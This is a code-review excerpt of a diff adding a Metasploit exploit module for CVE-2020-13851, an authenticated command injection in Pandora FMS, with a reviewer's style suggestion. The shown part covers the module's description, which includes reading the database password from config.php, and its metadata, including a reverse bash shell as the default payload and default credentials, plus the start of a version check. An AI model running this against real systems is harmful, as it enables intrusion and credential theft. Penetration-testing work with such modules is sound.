modules/exploits/linux/http/pandora_fms_events_exec.rb

```diff
@@ -0,0 +1,185 @@
+          FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps
+          older versions) in order to execute arbitrary commands.
+
+          This module takes advantage of a command injection vulnerability in the
+          `Events` feature of Pandora FMS. This flaw allows users to execute
+          arbitrary commands via the `target` parameter in HTTP POST requests to
+          the `Events` function. After authenticating to the target, the module
+          attempts to exploit this flaw by issuing such an HTTP POST request,
+          with the `target` parameter set to contain the payload. If a shell is
+          obtained, the module will try to obtain the local MySQL database
+          password via a simple `grep` command on the plaintext
+          `/var/www/html/pandora_console/include/config.php` file.
+
+          Valid credentials for a Pandora FMS account are required. The account
+          does not need to have admin privileges.
+          This module has been successfully tested on Pandora 7.0 NG 744 running
+          on CentOS 7 (the official virtual appliance ISO for this version).
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Fernando Catoira', # Discovery
+            'Julio Sanchez', # Discovery
+            'Erik Wynter' # @wyntererik - Metasploit
+          ],
+        'References' =>
+          [
+            ['CVE', '2020-13851'], # RCE via the `events` feature
+            ['URL', 'https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities']
+          ],
+        'Platform' => %w[unix linux],
+        'Arch' => ARCH_CMD,
+        'Targets' => [['Auto', {}]],
+        'Privileged' => true,
+        'DisclosureDate' => '2020-06-04',
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false,
+          'PAYLOAD' => 'cmd/unix/reverse_bash'
+        },
+        'DefaultTarget' => 0
+      )
+    )
+    register_options [
+      OptString.new('TARGETURI', [true, 'Base path to Pandora FMS', '/pandora_console/']),
+      OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pandora'])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
+    ]
+  end
+
+  def check
+    vprint_status('Running check')
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'index.php')
+
+    unless res
+      return CheckCode::Unknown('Connection failed.')
+    end
+
+    unless res.code == 200 && res.body.include?('<title>Pandora FMS - the Flexible Monitoring System</title>')
+      return CheckCode::Safe('Target is not a Pandora FMS application.')
+    end
+
+    @cookie = res.get_cookies
+    html = res.get_html_document
+    full_version = html.at('div[@id="ver_num"]').text
+
+    unless full_version && (!full_version.to_s.eql? '')
```

Comment:
`blank?` will check for an empty string or `nil`.

```suggestion
    if full_version.blank?
```